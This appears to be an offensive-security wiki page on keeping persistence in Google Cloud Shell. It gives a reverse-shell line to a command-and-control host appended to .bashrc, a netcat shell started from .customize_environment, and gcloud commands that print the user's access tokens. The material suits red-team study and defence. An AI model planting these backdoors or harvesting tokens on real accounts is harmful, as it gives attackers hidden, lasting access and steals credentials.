GCP - Cloud Shell Persistence
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Cloud Shell
For more information check:
Persistent Backdoor
Google Cloud Shell provides you with command-line access to your cloud resources directly from your browser without any associated cost.
You can access Google's Cloud Shell from the web console or running gcloud cloud-shell ssh
This console has some interesting capabilities for attackers:
- Any Google user with access to Google Cloud has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
- Said instance will maintain its home directory for at least 120 days if no activity happens.
- There is no capabilities for an organisation to monitor the activity of that instance.
This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
There is another file in the home folder called .customize_environment
that, if exists, is going to be executed everytime the user access the cloud shell (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
It is important to note that the first time an action requiring authentication is performed, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
This is the pop-up from executing gcloud projects list
from the cloud shell (as attacker) viewed in the browsers user session:
However, if the user has actively used the cloudshell, the pop-up won't appear and you can gather tokens of the user with:
gcloud auth print-access-token
gcloud auth application-default print-access-token
How the SSH connection is stablished
Basically, these 3 API calls are used:
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (will make you add your public key you created locally)
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (will make you start the instance)
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (will tell you the ip of the google cloud shell)
But you can find further information in https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key
- https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec
- https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key
- https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/
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